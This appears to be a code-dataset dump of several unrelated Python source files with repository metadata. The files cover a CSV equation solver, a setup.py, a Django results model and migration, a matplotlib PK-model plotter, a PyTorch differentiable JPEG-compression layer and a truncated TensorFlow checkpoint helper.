m2 = float(rows[row][11])
Fa1A = float(rows[row][9])
Fa2A = float(rows[row][12])
Fu1A = 1-Fa1A
Fu2A = 1-Fa2A
rows[row][14] = equation_solver_wrapper(Fa1A, Fu1A, Fa2A, Fu2A, m1, m2)
rows[row][18] = 1 - rows[row][14]
rows[row][22] = math.log(rows[row][18]/rows[row][14] ,10)
except:
rows[row][14] = "DNE"
rows[row][18] = "DNE"
rows[row][22] = "DNE"
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1A = float(rows[row][9])
Fa2B = float(rows[row][13])
Fu1A = 1-Fa1A
Fu2B = 1-Fa2B
rows[row][15] = equation_solver_wrapper(Fa1A, Fu1A, Fa2B, Fu2B, m1, m2)
rows[row][19] = 1 - rows[row][15]
rows[row][23] = math.log(rows[row][19]/rows[row][15],10)
except Exception as e:
rows[row][15] = "DNE"
rows[row][19] = "DNE"
rows[row][23] = "DNE"
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1B = float(rows[row][10])
Fa2A = float(rows[row][12])
Fu1B = 1-Fa1B
Fu2A = 1-Fa2A
#guess Fu
rows[row][16] = equation_solver_wrapper(Fa1B, Fu1B, Fa2A, Fu2A, m1, m2)
#guess Fa
rows[row][20] = 1 - rows[row][16]
#guess inhib
rows[row][24] = math.log(rows[row][20]/rows[row][16],10)
except:
rows[row][16] = "DNE"
rows[row][20] = "DNE"
rows[row][24] = "DNE"
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1B = float(rows[row][10])
Fa2B = float(rows[row][13])
Fu1B = 1-Fa1B
Fu2B = 1-Fa2B
rows[row][17] = equation_solver_wrapper(Fa1B, Fu1B, Fa2B, Fu2B, m1, m2)
rows[row][21] = 1 - rows[row][17]
rows[row][25] = math.log(rows[row][21]/rows[row][17],10)
except:
rows[row][17] = "DNE"
rows[row][21] = "DNE"
rows[row][25] = "DNE"
with open(sys.argv[2], "wb") as f:
writer = csv.writer(f)
writer.writerows(rows) | 595 | 0 | 71 |
f4fbe171060d67aad65e5f5de62f76eb891714f0 | 800 | py | Python | setup.py | beaumartinez/twittercide | 5ef74560f17f7e2497edb3ae915dc0172e4fcf5d | [
"0BSD"
] | 2 | 2015-01-04T04:34:03.000Z | 2018-04-18T20:35:29.000Z | setup.py | beaumartinez/twittercide | 5ef74560f17f7e2497edb3ae915dc0172e4fcf5d | [
"0BSD"
] | null | null | null | setup.py | beaumartinez/twittercide | 5ef74560f17f7e2497edb3ae915dc0172e4fcf5d | [
"0BSD"
] | null | null | null | #! /usr/bin/env python
from setuptools import find_packages
from setuptools import setup
with open('README.md') as readme_file:
readme = readme_file.read()
# Package metadata. Note: the keyword is `license` — `licence` is only a
# deprecated distutils alias and is rejected/ignored by modern setuptools.
setup(
    author='Beau Martinez',
    classifiers=[
        'Programming Language :: Python :: 2.7',
    ],
    description='Delete your tweets and backup tweeted photos to Google Drive.',
    entry_points={
        'console_scripts': [
            'twittercide = twittercide.__main__:main',
        ],
    },
    install_requires=[
        'arrow==0.4.4',
        'python-dateutil>=2.3',
        'requests-foauth>=0.1.1',
        'requests>=2.5.0',
    ],
    license='ISC',
    long_description=readme,
    name='twittercide',
    packages=find_packages(),
    url='http://github.com/beaumartinez/twittercide',
    version='0.1',
)
| 22.857143 | 80 | 0.61375 | #! /usr/bin/env python
from setuptools import find_packages
from setuptools import setup
with open('README.md') as readme_file:
readme = readme_file.read()
# Package metadata. Note: the keyword is `license` — `licence` is only a
# deprecated distutils alias and is rejected/ignored by modern setuptools.
setup(
    author='Beau Martinez',
    classifiers=[
        'Programming Language :: Python :: 2.7',
    ],
    description='Delete your tweets and backup tweeted photos to Google Drive.',
    entry_points={
        'console_scripts': [
            'twittercide = twittercide.__main__:main',
        ],
    },
    install_requires=[
        'arrow==0.4.4',
        'python-dateutil>=2.3',
        'requests-foauth>=0.1.1',
        'requests>=2.5.0',
    ],
    license='ISC',
    long_description=readme,
    name='twittercide',
    packages=find_packages(),
    url='http://github.com/beaumartinez/twittercide',
    version='0.1',
)
| 0 | 0 | 0 |
9c4590f9f6a92336f506f82a881a87cbc141ae94 | 10,753 | py | Python | backend/database/result.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
] | 5 | 2020-02-02T14:58:15.000Z | 2022-01-07T08:24:37.000Z | backend/database/result.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
] | 773 | 2020-01-04T22:54:01.000Z | 2022-03-31T16:07:56.000Z | backend/database/result.py | brownben/munro | 2beeae23f29fd064b102a44a1c2d3d852eed65e0 | [
"MIT"
] | 1 | 2021-12-25T14:32:25.000Z | 2021-12-25T14:32:25.000Z | from __future__ import annotations
from typing import Any, Dict, List, Literal, Optional, Union
from .event import Event
from .database import query, queryWithResult, queryWithResults
properties = [
"time",
"position",
"points",
"incomplete",
"event",
"competitor",
"type",
"course",
"id",
"name",
"ageClass",
"club",
"course",
"eventName",
]
| 28.149215 | 75 | 0.464894 | from __future__ import annotations
from typing import Any, Dict, List, Literal, Optional, Union
from .event import Event
from .database import query, queryWithResult, queryWithResults
properties = [
"time",
"position",
"points",
"incomplete",
"event",
"competitor",
"type",
"course",
"id",
"name",
"ageClass",
"club",
"course",
"eventName",
]
class Result:
id: int
time: int
position: Union[int, Literal[""]]
points: int
incomplete: bool
type: str
course: str
event: str
eventName: Optional[str]
competitor: int
# competitor data
name: Optional[str]
ageClass: Optional[str]
club: Optional[str]
    def __init__(self, result):
        """Build a Result from either a dict of fields or a DB row sequence.

        A dict is copied attribute-by-attribute; a sequence is zipped
        positionally against the module-level ``properties`` column list.
        """
        if type(result) == dict:
            for key in result:
                setattr(self, key, result[key])
        else:
            for (index, value) in enumerate(result):
                key = properties[index]
                # `properties` lists "course" twice (results.course and
                # competitors.course); keep the first truthy value seen.
                if not (hasattr(self, key) and getattr(self, key)):
                    setattr(self, key, value)
        # The DB may store booleans as the strings "true"/"false".
        if type(self.incomplete) == str:
            self.incomplete = self.incomplete == "true"
        # -1 is the stored sentinel for "no position" (see create()).
        if self.position == -1:
            self.position = ""
        if not hasattr(self, "eventName"):
            self.eventName = None
def toDictionary(self) -> Dict[str, Any]:
return {
"id": self.id,
"time": self.time,
"position": self.position,
"points": self.points,
"incomplete": self.incomplete,
"type": self.type,
"course": self.course,
"event": self.event,
"competitor": self.competitor,
"name": self.name,
"ageClass": self.ageClass,
"club": self.club,
"eventName": self.eventName,
"eventId": self.event,
}
def create(self) -> None:
if self.position == "":
self.position = -1
query(
"""
INSERT INTO results (
time,
position,
points,
incomplete,
event,
competitor,
type,
course
) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)
""",
(
self.time,
self.position,
self.points,
self.incomplete,
self.event,
self.competitor,
self.type,
self.course,
),
)
@staticmethod
def updatePoints(resultId: int, points: int) -> None:
query(
"""
UPDATE results
SET points=%s
WHERE rowid=%s
""",
(points, resultId),
)
def updateIncomplete(self, incomplete: bool) -> None:
query(
"""
UPDATE results
SET incomplete=%s
WHERE rowid=%s
""",
(incomplete, self.id),
)
def updateType(self, type: str) -> None:
query(
"""
UPDATE results
SET type=%s
WHERE rowid=%s
""",
(type, self.id),
)
def getEvent(self) -> Optional[Event]:
if event := Event.getById(self.event):
return event
return None
@staticmethod
def getById(rowid: int) -> Result:
databaseResult = queryWithResult(
"""
SELECT
results.time,
results.position,
results.points,
results.incomplete,
results.event,
results.competitor,
results.type,
results.course,
results.rowid,
competitors.name,
competitors.ageClass,
competitors.club,
competitors.course
FROM competitors, results
WHERE
results.rowid=%s
AND results.competitor=competitors.rowid
""",
(rowid,),
)
return Result(databaseResult)
@staticmethod
def getByEvent(eventId: str) -> List[Result]:
databaseResult = queryWithResults(
"""
SELECT
results.time,
results.position,
results.points,
results.incomplete,
results.event,
results.competitor,
results.type,
results.course,
results.rowid,
competitors.name,
competitors.ageClass,
competitors.club,
competitors.course
FROM competitors, results
WHERE
results.competitor=competitors.rowid
AND event=%s
AND COALESCE(results.type, '') <> 'hidden'
ORDER BY results.course ASC, results.position ASC
""",
(eventId,),
)
return [Result(result) for result in databaseResult]
@staticmethod
def getDynamicResultsByLeague(league: str) -> List[Result]:
databaseResult = queryWithResults(
"""
SELECT
results.time,
results.position,
results.points,
results.incomplete,
results.event,
results.competitor,
results.type,
results.course,
results.rowid,
competitors.name,
competitors.ageClass,
competitors.club,
competitors.course
FROM competitors, results
WHERE
results.competitor=competitors.rowid
AND competitors.league=%s
AND COALESCE(results.type, '') <> 'hidden'
AND results.type IS NOT NULL
ORDER BY competitors.course ASC, results.position ASC
""",
(league,),
)
return [Result(result) for result in databaseResult]
@staticmethod
def getByCompetitor(competitor: int) -> List[Result]:
databaseResult = queryWithResults(
"""
SELECT
results.time,
results.position,
results.points,
results.incomplete,
results.event,
results.competitor,
results.type,
results.course,
results.rowid,
competitors.name,
competitors.ageClass,
competitors.club,
competitors.course,
events.name
FROM competitors, results, events
WHERE
results.competitor=competitors.rowid
AND results.event=events.id
AND competitor=%s
AND COALESCE(results.type, '') <> 'hidden'
ORDER BY events.date ASC
""",
(competitor,),
)
return [Result(result) for result in databaseResult]
@staticmethod
def getNonDynamicPointsByCompetitor(competitor: int) -> List[int]:
result = queryWithResult(
"""
SELECT string_agg(results.points::text,';')
FROM results, competitors
WHERE
results.competitor=competitors.rowid
AND COALESCE(type,'') <> 'max'
AND COALESCE(type,'') <> 'average'
AND COALESCE(type,'') <> 'manual'
AND COALESCE(type,'') <> 'hidden'
AND competitors.rowid=%s
GROUP BY competitors.rowid
""",
(competitor,),
)
return [int(result) for result in result[0].split(";")]
@staticmethod
def getAll() -> List[Result]:
databaseResult = queryWithResults(
"""
SELECT
results.time,
results.position,
results.points,
results.incomplete,
results.event,
results.competitor,
results.type,
results.course,
results.rowid,
competitors.name,
competitors.ageClass,
competitors.club,
competitors.course
FROM competitors, results
WHERE
results.competitor=competitors.rowid
AND COALESCE(results.type, '') <> 'hidden'
"""
)
return [Result(result) for result in databaseResult]
@staticmethod
def getByEventForRecalc(eventId: str) -> List[Dict[str, Any]]:
databaseResult = queryWithResults(
"""
SELECT
results.time,
results.position,
results.points,
results.incomplete,
results.event,
results.competitor,
results.type,
results.course,
results.rowid,
competitors.name,
competitors.ageClass,
competitors.club,
competitors.course
FROM competitors, results
WHERE
results.competitor=competitors.rowid
AND event=%s
AND COALESCE(type, '') <> 'manual'
AND COALESCE(type, '') <> 'max'
AND COALESCE(type, '') <> 'average'
ORDER BY results.course ASC, results.time ASC
""",
(eventId,),
)
return [Result(result).toDictionary() for result in databaseResult]
@staticmethod
def updateFromRecalc(data: Dict[str, Any]) -> None:
query(
"""
UPDATE results
SET
time=%s,
position=%s,
points=%s,
incomplete=%s
WHERE rowid=%s
""",
(
data["time"],
data["position"],
data["points"],
data["incomplete"],
data["id"],
),
)
@staticmethod
def transfer(competitor: int, result: int) -> None:
query(
"""
UPDATE results
SET competitor=%s
WHERE rowid=%s
""",
(competitor, result),
)
@staticmethod
def deleteByEvent(eventId: str) -> None:
query(
"""
DELETE FROM results
WHERE event=%s
""",
(eventId,),
)
| 9,384 | 944 | 23 |
4c974887fd1b1b9962ef96e605440ab8067fc6be | 2,952 | py | Python | plotdev.py | SABSR3-Group-2/PKLibaryGroup2 | 99b065e75aed0a5e640f218455b9c9e452613fa6 | [
"MIT"
] | null | null | null | plotdev.py | SABSR3-Group-2/PKLibaryGroup2 | 99b065e75aed0a5e640f218455b9c9e452613fa6 | [
"MIT"
] | 11 | 2020-10-21T13:41:53.000Z | 2020-10-28T10:16:56.000Z | plotdev.py | SABSR3-Group-2/PKLibaryGroup2 | 99b065e75aed0a5e640f218455b9c9e452613fa6 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
# solveData = pd.DataFrame(data = [[1,2,4,8,16,32,64,128],[1,1,2,3,4,3,2,1]], columns=[0,1,2,3,4,5,6,7])
# solveData = solveData.transpose()
# a = [[1,2,3,4],[4,3,2,1,2,3,4,3,2,1]]
# #b= np.array(a)
# c = np.array(a).T
# newData = pd.DataFrame(data = a, columns=[1,2,3,3.5,4,5,6,7,8,9])
# newData = newData.transpose()
# currentData = solveData
# currentData
# currentData = pd.concat([currentData, newData], axis=1, sort=False)
# fig = plt.figure()
# fig.suptitle("pk model")
# ax = fig.add_subplot(1,1,1)
# ax.set_xlabel("Time"+__unitsFormat("s"))
# ax.set_ylabel("Volume"+__unitsFormat("mg"))
# plt.plot(currentData)
# plt.show()
# #def updateData(solveData, newdata)
graph = plot()
graph.adddata([100,50,25,12,6,3,1,0.5],[0,2,3,4,5,6,7,9])
graph.adddata([[1,2,3,5,8,13,21],[15,4,3,2,1,2,3]],[1,2,3,4,5,6,7])
| 25.230769 | 104 | 0.602304 | import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def __unitsFormat(unitsInput):
    """Format a unit label for an axis caption: "mg" -> " (mg)".

    An empty label is passed through unchanged so captions without units
    get no stray parentheses.
    """
    if unitsInput == "":
        return unitsInput
    return " (" + unitsInput + ")"
# solveData = pd.DataFrame(data = [[1,2,4,8,16,32,64,128],[1,1,2,3,4,3,2,1]], columns=[0,1,2,3,4,5,6,7])
# solveData = solveData.transpose()
# a = [[1,2,3,4],[4,3,2,1,2,3,4,3,2,1]]
# #b= np.array(a)
# c = np.array(a).T
# newData = pd.DataFrame(data = a, columns=[1,2,3,3.5,4,5,6,7,8,9])
# newData = newData.transpose()
# currentData = solveData
# currentData
# currentData = pd.concat([currentData, newData], axis=1, sort=False)
# fig = plt.figure()
# fig.suptitle("pk model")
# ax = fig.add_subplot(1,1,1)
# ax.set_xlabel("Time"+__unitsFormat("s"))
# ax.set_ylabel("Volume"+__unitsFormat("mg"))
# plt.plot(currentData)
# plt.show()
# #def updateData(solveData, newdata)
class plot():
    """Accumulates PK-model time series in a pandas DataFrame (time points as
    the index, one column per series) and re-renders the plot every time a
    new series is added."""
    def __init__(self, masses=None, times=None):
        """Seed the store with optional initial series.

        :param masses: initial series values (list, or list of lists)
        :param times: time points labelling the initial series' samples
        """
        # Bug fix: the defaults were mutable lists (masses=[], times=[]),
        # which Python shares across all calls; use None sentinels instead.
        masses = [] if masses is None else masses
        times = [] if times is None else times
        solveData = pd.DataFrame(data=masses, columns=times)
        self.currentData = solveData.transpose()
    def adddata(self, newData=None, newtimeseries=None):
        """Append one series (1-D list) or several (2-D list) and refresh
        the plot window.

        :param newData: the new series' values
        :param newtimeseries: time points labelling the new samples
        """
        newData = [] if newData is None else newData
        newtimeseries = [] if newtimeseries is None else newtimeseries
        newData = np.array(newData)
        if len(newData.shape) == 1:
            # a single series: wrap so pandas sees one row
            newData = pd.DataFrame(data=[newData], columns=newtimeseries)
        else:
            newData = pd.DataFrame(data=newData, columns=newtimeseries)
        newData = newData.transpose()
        self.currentData = pd.concat([self.currentData, newData], axis=1, sort=False)
        self.show()
    def show(self):
        """Render all accumulated series in a fresh figure window."""
        self.setupFig()
        # NOTE(review): plt.plot returns a list of Line2D artists, which
        # clobbers the Figure stored by setupFig; kept for compatibility.
        self.fig = plt.plot(self.currentData)
        plt.show()
    def setupFig(self, title="PK Model", xunits="", yunits=""):
        """establishes a matplotlib figure to hold the graph displaying the results of the PK model

        :param title: Title displayed above graph, defaults to "PK Model"
        :type title: string, optional
        :param xunits: units for time on the axis, defaults to ""
        :type xunits: string, optional
        :param yunits: units for mass of the drug administered, defaults to ""
        :type yunits: string, optional

        :return: matplotlib figure
        :rtype: class 'matplotlib.figure.Figure'
        """
        self.fig = plt.figure()
        self.fig.suptitle(title)
        ax = self.fig.add_subplot(1, 1, 1)
        ax.set_xlabel("Time" + self.__unitsFormat(xunits))
        ax.set_ylabel("Volume" + self.__unitsFormat(yunits))
        return self.fig
    def __unitsFormat(self, unitsInput):
        """Wrap a non-empty unit label as " (label)"; empty stays empty."""
        if unitsInput != "":
            unitsOutput = " (" + unitsInput + ")"
        else:
            unitsOutput = unitsInput
        return unitsOutput
# Demo: seed an empty store, then append a decaying series and two more
# series at once (each call opens a plot window).
graph = plot()
graph.adddata([100,50,25,12,6,3,1,0.5],[0,2,3,4,5,6,7,9])
graph.adddata([[1,2,3,5,8,13,21],[15,4,3,2,1,2,3]],[1,2,3,4,5,6,7])
| 937 | 1,039 | 46 |
52b2b8048d01ad33751970a0ccba10527e01ab2d | 7,194 | py | Python | attack_methods/Jpeg_compression.py | ASU-Active-Perception-Group/decentralized_attribution_of_generative_models | b57c38b215cff4df24744262ffa02d41c61151ac | [
"MIT"
] | 3 | 2021-03-19T08:34:57.000Z | 2021-03-20T04:06:43.000Z | attack_methods/Jpeg_compression.py | ASU-Active-Perception-Group/decentralized_attribution_of_generative_models | b57c38b215cff4df24744262ffa02d41c61151ac | [
"MIT"
] | null | null | null | attack_methods/Jpeg_compression.py | ASU-Active-Perception-Group/decentralized_attribution_of_generative_models | b57c38b215cff4df24744262ffa02d41c61151ac | [
"MIT"
] | null | null | null | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
# def zigzag_indices(shape: (int, int), count):
# x_range, y_range = shape
# index_order = sorted(((x, y) for x in range(x_range) for y in range(y_range)),
# key=lambda p: (p[0] + p[1], -p[1] if (p[0] + p[1]) % 2 else p[1]))
#
# mask = np.zeros(shape)
# for r, c in index_order[:count]:
# mask[r,c] = 1
#
# return mask
def rgb2yuv(image_rgb, image_yuv_out):
""" Transform the image from rgb to yuv """
image_yuv_out[:, 0, :, :] = 0.299 * image_rgb[:, 0, :, :].clone() + 0.587 * image_rgb[:, 1, :, :].clone() + 0.114 * image_rgb[:, 2, :, :].clone()
image_yuv_out[:, 1, :, :] = -0.14713 * image_rgb[:, 0, :, :].clone() + -0.28886 * image_rgb[:, 1, :, :].clone() + 0.436 * image_rgb[:, 2, :, :].clone()
image_yuv_out[:, 2, :, :] = 0.615 * image_rgb[:, 0, :, :].clone() + -0.51499 * image_rgb[:, 1, :, :].clone() + -0.10001 * image_rgb[:, 2, :, :].clone()
def yuv2rgb(image_yuv, image_rgb_out):
""" Transform the image from yuv to rgb """
image_rgb_out[:, 0, :, :] = image_yuv[:, 0, :, :].clone() + 1.13983 * image_yuv[:, 2, :, :].clone()
image_rgb_out[:, 1, :, :] = image_yuv[:, 0, :, :].clone() + -0.39465 * image_yuv[:, 1, :, :].clone() + -0.58060 * image_yuv[:, 2, :, :].clone()
image_rgb_out[:, 2, :, :] = image_yuv[:, 0, :, :].clone() + 2.03211 * image_yuv[:, 1, :, :].clone()
| 43.077844 | 155 | 0.578121 | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
def gen_filters(size_x: int, size_y: int, dct_or_idct_fun: callable) -> np.ndarray:
    """Build a bank of separable (i)DCT basis filters.

    Each of the ``size_x * size_y`` filters is the outer product of the 1-D
    basis function evaluated along y and along x, so convolving an image tile
    with the whole bank computes a 2-D (i)DCT.

    Args:
        size_x: filter width (number of horizontal frequencies).
        size_y: filter height (number of vertical frequencies).
        dct_or_idct_fun: basis function ``f(n, k, N)`` such as ``dct_coeff``
            or ``idct_coeff``.

    Returns:
        Array of shape ``(size_x * size_y, size_y, size_x)`` with one filter
        per (k_y, k_x) frequency pair.
    """
    # Bug fix: the flat filter index previously used a hard-coded tile size
    # of 8 (and the array was shaped (count, size_x, size_y) while indexed
    # [.., n_y, n_x]), which broke for any non-8x8 request. Using size_x for
    # the stride and (size_y, size_x) for the spatial dims is identical for
    # the 8x8 case actually used and correct for all other sizes.
    filters = np.zeros((size_x * size_y, size_y, size_x))
    for k_y in range(size_y):
        for k_x in range(size_x):
            for n_y in range(size_y):
                for n_x in range(size_x):
                    filters[k_y * size_x + k_x, n_y, n_x] = (
                        dct_or_idct_fun(n_y, k_y, size_y)
                        * dct_or_idct_fun(n_x, k_x, size_x)
                    )
    return filters
# def zigzag_indices(shape: (int, int), count):
# x_range, y_range = shape
# index_order = sorted(((x, y) for x in range(x_range) for y in range(y_range)),
# key=lambda p: (p[0] + p[1], -p[1] if (p[0] + p[1]) % 2 else p[1]))
#
# mask = np.zeros(shape)
# for r, c in index_order[:count]:
# mask[r,c] = 1
#
# return mask
def get_jpeg_yuv_filter_mask(image_shape: tuple, window_size: int, keep_count: int):
    """Binary mask keeping the first `keep_count` zig-zag-ordered DCT
    coefficients of every `window_size` x `window_size` block, tiled to cover
    an image of `image_shape` (height, width)."""
    zigzag = sorted(
        ((x, y) for x in range(window_size) for y in range(window_size)),
        key=lambda p: (p[0] + p[1], -p[1] if (p[0] + p[1]) % 2 else p[1]),
    )
    block = np.zeros((window_size, window_size), dtype=np.uint8)
    for row, col in zigzag[:keep_count]:
        block[row, col] = 1
    reps_y = int(np.ceil(image_shape[0] / window_size))
    reps_x = int(np.ceil(image_shape[1] / window_size))
    tiled = np.tile(block, (reps_y, reps_x))
    return tiled[: image_shape[0], : image_shape[1]]
def dct_coeff(n, k, N):
    """DCT-II basis value cos(pi/N * (n + 1/2) * k) for sample n, frequency k."""
    angle = np.pi / N * (n + 0.5) * k
    return np.cos(angle)
def idct_coeff(n, k, N):
    """Inverse-DCT basis value; the n == 0 (DC) term is halved, and the whole
    value is scaled by sqrt(1 / (2N))."""
    dc_correction = -0.5 if n == 0 else 0.0
    cosine = np.cos(np.pi / N * (k + 1. / 2.) * n)
    return (dc_correction + cosine) * np.sqrt(1 / (2. * N))
def rgb2yuv(image_rgb, image_yuv_out):
    """Transform an (N, 3, H, W) RGB batch to YUV, writing into image_yuv_out.

    Each output channel is a fixed linear combination of cloned R/G/B planes
    (BT.601-style coefficients).
    """
    channel_weights = {
        0: (0.299, 0.587, 0.114),        # Y (luma)
        1: (-0.14713, -0.28886, 0.436),  # U
        2: (0.615, -0.51499, -0.10001),  # V
    }
    for out_channel, (w_r, w_g, w_b) in channel_weights.items():
        image_yuv_out[:, out_channel, :, :] = (
            w_r * image_rgb[:, 0, :, :].clone()
            + w_g * image_rgb[:, 1, :, :].clone()
            + w_b * image_rgb[:, 2, :, :].clone()
        )
def yuv2rgb(image_yuv, image_rgb_out):
    """Transform an (N, 3, H, W) YUV batch back to RGB, writing into
    image_rgb_out (inverse of rgb2yuv's coefficients)."""
    # Accessor callables so each output statement re-clones its inputs,
    # mirroring the per-statement read pattern of the forward transform.
    luma = lambda: image_yuv[:, 0, :, :].clone()
    chroma_u = lambda: image_yuv[:, 1, :, :].clone()
    chroma_v = lambda: image_yuv[:, 2, :, :].clone()
    image_rgb_out[:, 0, :, :] = luma() + 1.13983 * chroma_v()
    image_rgb_out[:, 1, :, :] = luma() + -0.39465 * chroma_u() + -0.58060 * chroma_v()
    image_rgb_out[:, 2, :, :] = luma() + 2.03211 * chroma_u()
class JpegCompression(nn.Module):
    """Differentiable approximation of JPEG compression.

    Pipeline (forward): pad to a multiple of 8, RGB -> YUV, per-8x8-block
    DCT, zero out high-frequency coefficients per channel (zig-zag order),
    inverse DCT, YUV -> RGB, un-pad.
    """
    def __init__(self, device, yuv_keep_weights = (25, 9, 9)):
        # yuv_keep_weights: number of zig-zag DCT coefficients kept per
        # Y/U/V channel (luma keeps the most, as in real JPEG).
        super(JpegCompression, self).__init__()
        self.device = device
        # 64 separable DCT/IDCT basis filters, reshaped to (64, 1, 8, 8)
        # so F.conv2d with stride 8 transforms each tile independently.
        self.dct_conv_weights = torch.tensor(gen_filters(8, 8, dct_coeff), dtype=torch.float32).to(self.device)
        self.dct_conv_weights.unsqueeze_(1)
        self.idct_conv_weights = torch.tensor(gen_filters(8, 8, idct_coeff), dtype=torch.float32).to(self.device)
        self.idct_conv_weights.unsqueeze_(1)
        # NOTE(review): attribute name keeps the original "weighs" typo.
        self.yuv_keep_weighs = yuv_keep_weights
        self.keep_coeff_masks = []
        self.jpeg_mask = None
        # create a new large mask which we can use by slicing for images which are smaller
        self.create_mask((1000, 1000))
    def create_mask(self, requested_shape):
        """(Re)build the cached (3, H, W) coefficient mask if it is missing
        or smaller than requested_shape (H, W)."""
        if self.jpeg_mask is None or requested_shape > self.jpeg_mask.shape[1:]:
            self.jpeg_mask = torch.empty((3,) + requested_shape, device=self.device)
            for channel, weights_to_keep in enumerate(self.yuv_keep_weighs):
                mask = torch.from_numpy(get_jpeg_yuv_filter_mask(requested_shape, 8, weights_to_keep))
                self.jpeg_mask[channel] = mask
    def get_mask(self, image_shape):
        """Return a (3, H, W) copy of the cached mask sliced to image_shape
        (C, H, W), growing the cache first if needed."""
        if self.jpeg_mask.shape < image_shape:
            self.create_mask(image_shape)
        # return the correct slice of it
        return self.jpeg_mask[:, :image_shape[1], :image_shape[2]].clone()
    def apply_conv(self, image, filter_type: str):
        """Run the 8x8 (i)DCT filter bank over each channel of an
        (N, 3, H, W) image; output keeps the same layout with every 8x8
        tile replaced by its transform coefficients."""
        if filter_type == 'dct':
            filters = self.dct_conv_weights
        elif filter_type == 'idct':
            filters = self.idct_conv_weights
        else:
            # NOTE(review): raising a plain str is a TypeError in Python 3;
            # should be e.g. `raise ValueError('Unknown filter_type value.')`.
            raise('Unknown filter_type value.')
        image_conv_channels = []
        for channel in range(image.shape[1]):
            # NOTE(review): unsqueeze_ mutates the input view in place.
            image_yuv_ch = image[:, channel, :, :].unsqueeze_(1)
            # (N, 64, H/8, W/8): 64 coefficients per tile
            image_conv = F.conv2d(image_yuv_ch, filters, stride=8)
            image_conv = image_conv.permute(0, 2, 3, 1)
            image_conv = image_conv.view(image_conv.shape[0], image_conv.shape[1], image_conv.shape[2], 8, 8)
            image_conv = image_conv.permute(0, 1, 3, 2, 4)
            # fold the per-tile 8x8 coefficient grids back to (N, H, W)
            image_conv = image_conv.contiguous().view(image_conv.shape[0],
                                                      image_conv.shape[1]*image_conv.shape[2],
                                                      image_conv.shape[3]*image_conv.shape[4])
            image_conv.unsqueeze_(1)
            # image_conv = F.conv2d()
            image_conv_channels.append(image_conv)
        image_conv_stacked = torch.cat(image_conv_channels, dim=1)
        return image_conv_stacked
    def forward(self, noised_and_cover):
        """Apply simulated JPEG compression to an (N, C, H, W) batch and
        return the compressed (N, 3, H, W) batch."""
        if(noised_and_cover.size()[1] == 1): #if given image has gray scale image,
            noised_and_cover = noised_and_cover.repeat(1,3,1,1) #just copy gray scale to RGB by copying
            #import torchvision.utils as vutils
            #vutils.save_image(noised_and_cover,
            #                  './gray_to_rgb.png', normalize=True, scale_each=True,
            #                  range=(-1, 1))
        noised_image = noised_and_cover
        # pad the image so that we can do dct on 8x8 blocks
        pad_height = (8 - noised_image.shape[2] % 8) % 8
        pad_width = (8 - noised_image.shape[3] % 8) % 8
        noised_image = nn.ZeroPad2d((0, pad_width, 0, pad_height))(noised_image)
        # convert to yuv
        image_yuv = torch.empty_like(noised_image)
        rgb2yuv(noised_image, image_yuv)
        assert image_yuv.shape[2] % 8 == 0
        assert image_yuv.shape[3] % 8 == 0
        # apply dct
        image_dct = self.apply_conv(image_yuv, 'dct')
        # get the jpeg-compression mask
        mask = self.get_mask(image_dct.shape[1:])
        # multiply the dct-ed image with the mask.
        image_dct_mask = torch.mul(image_dct, mask)
        # apply inverse dct (idct)
        image_idct = self.apply_conv(image_dct_mask, 'idct')
        # transform from yuv to to rgb
        image_ret_padded = torch.empty_like(image_dct)
        yuv2rgb(image_idct, image_ret_padded)
        # un-pad
        noised_and_cover = image_ret_padded[:, :, :image_ret_padded.shape[2]-pad_height, :image_ret_padded.shape[3]-pad_width].clone()
        return noised_and_cover
ffedf602d2f9c7fa1d071765a091d64c3cb50e73 | 413 | py | Python | session/migrations/0006_auto_20190415_1247.py | tonymontaro/mentorci_server | 527885a38da60e80698624309f99455e0c8b1192 | [
"MIT"
] | 2 | 2019-07-11T09:46:11.000Z | 2020-02-14T19:47:30.000Z | session/migrations/0006_auto_20190415_1247.py | tonymontaro/mentorci_server | 527885a38da60e80698624309f99455e0c8b1192 | [
"MIT"
] | 14 | 2019-07-05T08:52:17.000Z | 2022-02-10T08:25:03.000Z | session/migrations/0006_auto_20190415_1247.py | tonymontaro/mentorci_server | 527885a38da60e80698624309f99455e0c8b1192 | [
"MIT"
] | 2 | 2019-07-11T09:46:14.000Z | 2020-02-14T20:57:55.000Z | # Generated by Django 2.2 on 2019-04-15 12:47
from django.db import migrations, models
| 21.736842 | 74 | 0.607748 | # Generated by Django 2.2 on 2019-04-15 12:47
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration: changes SessionLog.concern to a
    # nullable TextField with an empty-string default (max_length=500 is
    # kept for form validation; it does not constrain a TextField column).
    dependencies = [
        ('session', '0005_auto_20190415_0524'),
    ]
    operations = [
        migrations.AlterField(
            model_name='sessionlog',
            name='concern',
            field=models.TextField(default='', max_length=500, null=True),
        ),
    ]
| 0 | 301 | 23 |
2020c53b7f2ac02ac70f17066db5bac7ae6d6bf8 | 2,643 | py | Python | trend/src/zutils/tensorflow/tf_store.py | limingmax/WFCode | f2e6d2fcf05ad9fdaac3a69603afee047ed37ca3 | [
"Apache-2.0"
] | 2 | 2018-10-23T01:56:46.000Z | 2018-10-23T01:56:49.000Z | trend/src/zutils/tensorflow/tf_store.py | limingmax/WFCode | f2e6d2fcf05ad9fdaac3a69603afee047ed37ca3 | [
"Apache-2.0"
] | null | null | null | trend/src/zutils/tensorflow/tf_store.py | limingmax/WFCode | f2e6d2fcf05ad9fdaac3a69603afee047ed37ca3 | [
"Apache-2.0"
] | null | null | null | # @Time : 2018-9-10
# @Author : zxh
import os
import tensorflow as tf
import sys
from zutils.utils import relative_project_path
| 39.447761 | 99 | 0.67045 | # @Time : 2018-9-10
# @Author : zxh
import os
import tensorflow as tf
import sys
from zutils.utils import relative_project_path
class TFStore:
    """Checkpoint/TensorBoard helper for a TensorFlow (v1) session.

